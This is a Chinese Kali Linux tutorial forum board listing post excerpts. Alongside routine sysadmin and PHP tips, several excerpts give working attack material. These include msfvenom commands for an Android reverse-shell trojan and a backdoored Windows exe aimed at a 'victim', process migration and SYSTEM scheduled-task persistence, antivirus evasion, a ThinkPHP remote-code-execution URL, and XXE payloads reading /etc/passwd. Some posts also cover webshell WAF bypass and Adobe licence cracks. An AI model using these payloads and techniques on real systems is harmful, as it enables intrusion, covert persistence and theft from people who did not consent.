Linux Kali高级学习教程
介绍Linux KALI的使用方法和各种系统工具的下载方法。
483个主题在此版面
-
在 Linux 系统下经常要查看各种信息,命令蛮多的,而且又是久不久用一次的那种,记不下来,每回找又麻烦,干脆自己写一份在博客里面,自己找起来也方便。系统uname -a #查看内核/操作系统/CPU信息 head -n 1 /etc/issue #查看操作系统版本 cat /etc/issue | grep Linux #查看当前操作系统内核信息 cat /proc/cpuinfo #查看CPU信息 hostname #查看计算机名 lspci -tv #列出所有PCI设备 lsusb -tv #列出所有USB设备 lsmod #列出加载的内核模块 env #查看环境变量资源free -m #查看内存使用量和交换区使用量 df -h #查看各分区使用情况 du -sh <dir> #查看指定目录的大小 cat /proc/meminfo #查看内存信息 grep MemTotal /proc/meminfo #查看内存总量 grep MemFree /proc/meminfo #查看空闲内存量 uptime #查看系统运行时间、用户数、负载 cat /proc/loadavg #查看系统…
-
- 0 篇回复
- 139 次查看
-
-
1.判断文件/目录是否存在is_file函数 is_file — 判断给定文件名是否为一个正常的文件,如果文件存在且为正常的文件则返回 TRUE,否则返回 FALSE。 官方说明:http://php.net/manual/zh/function.is-file.php is_dir函数 is_dir() 函数检查指定的文件是否是一个目录。如果文件名存在,并且是个目录,返回 TRUE,否则返回FALSE。 官方说明:http://php.net/manual/zh/function.is-dir.php file_exists() 函数 file_exists() 函数检查文件或目录是否存在。如果指定的文件或目录存在则返回 true,否则返回 false。有点像上面2个函数的综合体。 更多说明参考:PHP file_exists() 函数 2.读取文件file_get_contents()函数 file_get_contents — 将整个文件读入一个字符串 PHP官方使用说明:http://php.net/manual/zh/function.file-get-contents.php fread() 函数 读取这个文件的列子: <?php $file = fopen("test.txt","r"); fread($file,filesize("test.txt")); fclose($file); ?>更多使用说明可参考:PHP fread() 函数 3.写入文件PHP fread() 函数 实例: <?php…
-
- 0 篇回复
- 132 次查看
-
-
pushState + ajax = pjax 带来最直观的效果是整个网站变成单页应用。这样的效果将会极大的提升用户体验,并且可以减少https的请求的次数和内容。使用github上面的一个开源项目defunkt/jquery-pjax 可以很轻松的帮助我们实现pjax。 需要具备基础的html & javascript 知识。如果你连div和script标签仍然不认识,请忽略该篇文章。 引入js在header.php或者footer.php中添加下面代码 <script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script> <script src="//cdn.bootcss.com/jquery.pjax/1.9.6/jquery.pjax.min.js"></script>注意顺序,不能错哦! 实现代码<script> //pjax 刷新 $(document).pjax('a[href^="<?php Helper::options()->siteUrl()?>"]:not(a[target="_blank"], a[no-pjax])', { container: '#pjax-container', fragment: '#pjax-container', timeout: 3000 }).on('pjax:send', function() { …
-
- 0 篇回复
- 126 次查看
-
-
MSFVENOM常规选项1. –p (- -payload-options)添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l查看所有payload encoder nops。 3. –f (- -help-formats)输出文件格式。 (- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war Transform formats: , c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript 4. –e编码免杀。 5. –a (- -platfo…
-
- 0 篇回复
- 139 次查看
-
-
1.配置服务器的rewrite规则如果在保存上述配置的时候,typecho无法自动配置,那么你可能需要手动配置服务器的rewrite规则。 Linux Apache 环境 (.htaccess):<IfModule mod_rewrite.c> RewriteEngine On #下面是在根目录,文件夹要修改路径 RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>Linux Apache 环境(Nginx):location / { index index.html index.php; if (-f $request_filename/index.html) { rewrite (.*) $1/index.html break; } if (-f $request_filename/index.php) { rewrite (.*) $1/index.php; } if (!-f $request_filename) { rewrite (.*) /index.php; } }Windows IIS 伪静态 (httpd.ini):[ISAPI_Rewrite] #3600 = 1 hour CacheClockRate 3600 RepeatLimit 32 #中文tag解决 RewriteRu…
-
- 0 篇回复
- 129 次查看
-
-
本地工具proxychains4或者Proxifier。这边比较推荐的就是他俩。如果大佬们有更好用的可以推荐给我。 我日常渗透用的是MAC,并且我把一部分常用工具都搬到了我的OSX下,在我实际做渗透的时候发现更多情况下proxychains4要比Proxifier好用。 有些时候在用一些Python脚本(比如F-NAScan)通过代理扫描的时候Proxifier会全部误报,并且Proxifier在我的MAC上没办法正确代理MSF的流量,所以我一般选择的都是proxychains4。不知道有没有别的大佬也遇到过这种情况,如果有大佬知道怎么解决这个问题请py一下。 另外MAC上使用proxychains4是有坑的,要先去禁用SIP。 这里推荐proxychains4并不是说Proxifier不好用,只是有些情况不适用,但是Proxifier有他的强大之处,它可以自己指定规则,用起来很方便,尤其适用OSX下的一些客户端工具的流量代理,所以建议大家在实际使用的时候最好两者搭配起来使用。 HTTP代理一般情况下就是reGeorg,GitHub上可以找到这个项目的,看一下readme就可以用了,HTTP代理的优势就是利用的就是本身的web端口,有效突破各种防火墙,但是缺点就是不够稳定。 在实际渗透中经常能遇到内网中的WEB服务器,通过nginx反代,或者经过堡垒机才能访问外网,这时候可能搞下来的WEB机器并不可以直接访问外网,这时候不得已的话只能采用HTTP代理。 Socks代理Termite作为EW的进化版支持更多功能,两个版本的看情况使用,如果只…
-
- 0 篇回复
- 128 次查看
-
-
示例代码如下: Connection con = null; //定义一个MYSQL链接对象 Class.forName("com.mysql.jdbc.Driver").newInstance(); //MYSQL驱动 con = DriverManager.getConnection("jdbc:mysql://127.0.0.1:3306/blog", "root", "123456"); //链接本地MYSQL Statement stmt; //创建声明 stmt = con.createStatement(); //update String sql = "Update user Set views='"+b+"' Where cid='"+a+"'"; stmt.executeUpdate(sql);//执行sql语句 JOptionPane.showConfirmDialog(null, "恭喜!数据写入成功!", "温馨提示", JOptionPane.YES_NO_OPTION); co…
-
- 0 篇回复
- 124 次查看
-
-
#写在前面: 过狗相关的资料网上也是有很多,所以在我接下来的文章中,可能观点或者举例可能会与网上部分雷同,或者表述不够全面。 但是我只能说,我所传达给大家的信息,是我目前所掌握或者了解的,不能保证所有人都会有收获,但是个人水平有限,可能您觉得文章水平过低,或者并无太大营养。但是跳出文章本身,无论何种技术,重在交流,分享与总结。 另外,希望年轻人不要有太多戾气,更多的是需要保持一个谦逊态度对待技术,尤其是这个浮躁的安全界。 以上是我的开场白(没办法,这是我的一贯风格) 写php后门连载的目的。希望大家能够暂缓日站的脚步,静下心来想一想,我们在用菜刀做一些除(sang)暴(jin)安(tian)良(liang)的事的时候,php做了些什么,安全狗又蜷缩在门后目睹了些什么。 其实我更愿意传授安全之道,而非渗透之术。 参考过网上很多种已有的php后门的写法,总之思路各种奇葩与新奇,但是衡量一个优秀的php后门并不是单单的看代码多少,过狗怎么样,而是一种基于实际场景的一种变通,所以,php后门这是一门艺术。 连接后门时发生了什么所以当我在菜刀中双击连接的时候到底发生了什么,安全狗又是如何发现后门并拦截的? php后门原理很简单,当我们连接时,实际上我们会向php文件post数据,这个数据的内容为我们需要php去执行的代码,当php获取到数据并执行后,将返回一个response。 那么waf能够识别到什么层次?其实waf最多获取到tcp数据,也就是说,可以获取到我们所post的数据,与服务器所返回的数据,至于php执行命令的过程,用了什么对象,走了什…
-
- 0 篇回复
- 122 次查看
-
-
普通版在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk这样便生成了一个名为 TPLINK.apk的Android木马。 然后我们配合 msfcosole进行攻击即可。 msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LPORT 5555 exploit手机端安装并执行,成功获得shell。 一些另外的玩法给手机播放视频和音频文件(需更新到最新版的msf)命令格式: paly /root/xxx.mp3 mp4 修改手机壁纸background use post/multi/manage/set_wallpaper sessions set sessions id set WALLPAPER_FILE JPG exploit晋级玩法利用 armitage图形化管理工具 可视化的文件管理 骨灰级外网木马我们可以利用花生壳进行端口映射完成外网木马的渗透测试,添加端口如下! 然后在kali中设置花生壳的端口和ip地址即可。 那么!你还有那些另类的玩法呢?一起在下方交流吧。 木马免杀对于以上的木马,是无法通过杀毒软件的查杀的,我们可以将 payload加入到正常的APP中,来起来免杀的效果。 命令:…
-
- 0 篇回复
- 181 次查看
-
-
前言生成excel 当然使用的是 phpExcel这个类库了,可是它太麻烦了,对于只要简单生成来说有点不值得什么叫简单,把数据库的数据导入到excel就行了, 这个就是简单了 代码如下:<?php header("Content-type:application/vnd.ms-excel"); header("Content-Disposition:filename=test.xls"); echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; echo "test1\t"; echo "test2\t\n"; ?> 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/523.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
- 0 篇回复
- 119 次查看
-
-
很多用户表示重装win7系统后,即便重装不捆绑其他软件,但win7系统仍会自带IE浏览器。可以说,重装系统后的IE简直就是网上冲浪的大门,只要双击,就能够到达你想要到达的地方。 也可以说,你和IE曾经也有过一段烂俗的爱情故事,只是太多的“第三者”都恨不得插入你们之间,随后你真变心了,把那些“海枯石烂、地老天荒”的誓言抛掷脑后了,就连IE可怜巴巴地求你把它设置为默认浏览器你都置之不理,直把IE逼入冷宫。 设置为默认浏览器?答案当然是拒绝!IE又慢又卡,备受用户们地各种吐槽,有时候用IE电脑卡到想砸了的心都有。可摔电脑,总归是舍不得的!那就让它从你的视线中消失吧,你把它拖进回收站,清空,那是不可能的!你删除的只是它的快捷键,再次见面它还是默默无闻、孤苦伶仃地装饰着我们的桌面。 有人问:IE浏览器存在的意义到底是什么?想想都知道,要是没有IE,你拿什么下载chrome和火狐? 如果你的身边早就有了其他浏览器的环绕,你还留着IE有啥用呢?被用户吐槽想删删不掉的IE,真有办法让它消失在你的视线中了。 1、 我们可以按照普通方式(开始 > 运行)打开运行,但小编比较喜欢的是使用组合键“win+r”,输入“control”后,回车或点击“确定” 2、 进入控制面板后,点击程序的“卸载程序” 3、 点击后我们选择“查看已安装的更新” 4、 接下来我们要做的一件事就是要把“internet explorer 9”找出来,这个代表的是IE浏览器,找到之后单击右键卸载 版权属于:逍遥子大表哥 本文链接:https://blog.bbs…
-
- 0 篇回复
- 151 次查看
-
-
在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskal…
-
- 0 篇回复
- 129 次查看
-
-
[Meting] [Music server="netease" id="1330861946" type="song"/] [/Meting] 前言下午闲来无事,写了linux下的定时任务管理。大体思路是这样的,首先备份数据库,让后将数据库发送到我们指定的邮箱中。并删除本地备份的数据。shell脚本#!/bin/ #进入到备份文件夹 cd /root/back #创建存放备份文件和数据库的文件夹,并修改权限为777 mkdir -m 777 -p ./backup$(date +"%Y%m%d") #导出数据库到备份文件夹内 mysqldump -u 数据库账号 -p密码 数据库 > ./backup$(date +"%Y%m%d")/blog.sql #压缩存放备份文件和数据库的文件夹 tar zcvf ./backup$(date +"%Y%m%d").tar.gz ./backup$(date +"%Y%m%d") #以附件形式发送压缩包到指定邮箱 echo "数据备份"|mail -v -s "备份时间:$(date +%Y-%m-%d)" -a /root/back/backup$(date +"%Y%m%d").tar.gz [email protected] #删除备份文件夹与压缩包 rm -rf /root/back/backup$(date +"%Y%m%d") rm /root/back/backup$(date +"%Y%m%d").tar.gz安装环境yum install sendmail yum insta…
-
- 0 篇回复
- 134 次查看
-
-
前言ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 漏洞分析Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815 关键代码:// 获取控制器名 $controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 漏洞利用执行系统命令显示目录下文件http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l …
-
- 0 篇回复
- 142 次查看
-
-
XML 被设计用来传输和存储数据。 语法规则<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明--> <girl age="18"> <!--自定的根元素girl;age属性需要加引导--> <hair>长头发</hair> <!--自定义的4个子元素,即girl对象的属性--> <eye>大眼睛</eye> <face>可爱的脸庞</face> <summary>可爱美丽的女孩</summary> </girl> <!--根元素的闭合-->Payload获取账户密码: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <xxe>&xxe;</xxe> 读取网站任意文件:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note[ <!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt"> ]> <reset><login>&…
-
- 0 篇回复
- 137 次查看
-
-
原因今天网站的证书快要过期了,但是下载下来发现原来的public.pem和chain.pem证书变成了.crt证书。配置老是出现错误,想着能不能将crt转换成pem。 解决方案linux命令 cat your_server1.crt COMODORSADomainValidationSecureServerCA.crt COMODORSAAddTrustCA.crt AddTrustExternalCARoot.crt > your_server2.pem 参数:your_server1.crt 表示你转格式之前的crt格式证书 参数:your_server2.pem 表示转格式之后的pem格式证书 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/615.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
- 0 篇回复
- 122 次查看
-
-
虚拟专用网络的功能是:在公用网络上建立专用网络,进行加密通讯。在企业网络中有广泛应用。VPN网关通过对数据包的加密和数据包目标地址的转换实现远程访问。VPN有多种分类方式,主要是按协议进行分类。VPN可通过服务器、硬件、软件等多种方式实现。 其实VPN技术主要是为了解决异地办公的问题。打个比方,你在家里,需要访问到公司网络里的某台机器,获取资料。传统的方法是在各级路由做地址映射,将需要访问的机器一层一层映射到公网中,然后通过公网访问。这样配置起来不仅麻烦,而且内部的机器暴露在了公网上,安全性也得不到保障。另外一个解决方法是拉专线,将各个地方的网络组成一个局域网。这样虽然安全性得到了保障,但是运营商拉专线的费用也是出奇的高,动辄几万几十万一年,根本不是个人用户能够承受的。在这篇文章中,你只需要一台云服务器,搭建一个VPN网关,将需要访问的机器连接到服务器,就可以组建一个异地局域网了。云服务器相当于家里的路由器,连接到这台“路由器”的所有设备都会处于同一个局域网中,局域网里的机器可以互相访问,可以实现远程桌桌面,甚至可以一起玩局域网游戏。放张简单的拓扑图(从蒲公英官网偷的): 当然网上也有专门做这种的,如上图的蒲公英路由器。也可以很方便的进行一键组网,原理也是一样的。但是这种商业化的东西,要么就给钱买路由器或者买带宽节点数,要么就做免费用户,1M的网速+最多连接三台设备,限制很大。 好了下面我们进入正题,准备一台云服务器(推荐使用国内的,延迟低,不会掉线),搭建属于我们自己的异地局域网。 一 使用一键脚本搭建L2TP+IPSecwget -…
-
- 0 篇回复
- 149 次查看
-
-
定时任务 前提: 已获得目标系统管理员组任何一个成员权限。 命令: schtasks /create /tn "system" /tr C:\Windows\client.exe /sc MINUTE /mo 1 /ru "System" /RL HIGHEST命令解释: /create =>创建任务 /tn "system" =>指定任务名称为system /tr C:\Windows\client.exe =>指定程序路径 /sc MINUTE /mo 1 =>指定类型;MINUTE表示任务每n分钟运行一次,/mo 1表示每1分钟执行一次 /ru "System" =>指定为system用户运行该任务 /RL HIGHEST =>运行级别,HIGHEST为使用最高权限运行远控这里分享一款国外的开源远控,githubgithub 地址 亲测过包括360,收费版AVG,卡巴斯基在内的大多数杀软。 生成client.exe之后放到目标机器以计划任务执行。 标上线并且获取了system权限! 再来试试msf: 首先生成木马 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.52.130 LPORT=2333 -f exe > /root/Desktop/test.exe生成后门,用shikata_ga_nai编码绕过IDS检测. 在受…
-
- 0 篇回复
- 114 次查看
-
-
1.CCMaker CCMaker无疑是非常常用的一款Adboe套件安装器了,安装可选加装AMTEmu工具绕过授权验证机制,可以直接不登陆Adobe账户直接安装指定的套件,方便快捷。不过受限于国内网络环境,可能出现下载不稳定等情况。 2.嬴政天下系列 众所周知,嬴政天下系列的Adobe套件一直受到广大使用者们的喜爱,不论是长久来及时的更新,还是质量的优越都成就了如今的口碑。此系列可选完全和独立包,直装后即可使用。 3.Adobe.Anticloud插件 该插件使用方法简单,安装完所需的Adobe套件后直接安装此插件即可,原理为劫持授权检测模块。 4.amtemu插件 该插件一直以其轻巧,简介的优点为人所知,只需要选择要打补丁的程序,并且找到对应程序目录下的指定dll文件即可,效率较高。由于其高效的解决方案,因此使用时指定2017版本的程序亦可使用在2018版本程序中,不过部分版本设置可能需要修改以便达到最佳效果,此插件几乎不会触发任何安全软件警告 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/627.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
-
- 0 篇回复
- 114 次查看
-